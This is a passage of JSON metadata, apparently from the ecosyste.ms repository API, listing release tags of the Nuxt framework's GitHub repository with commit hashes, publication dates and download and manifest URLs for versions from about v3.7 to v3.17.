ags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_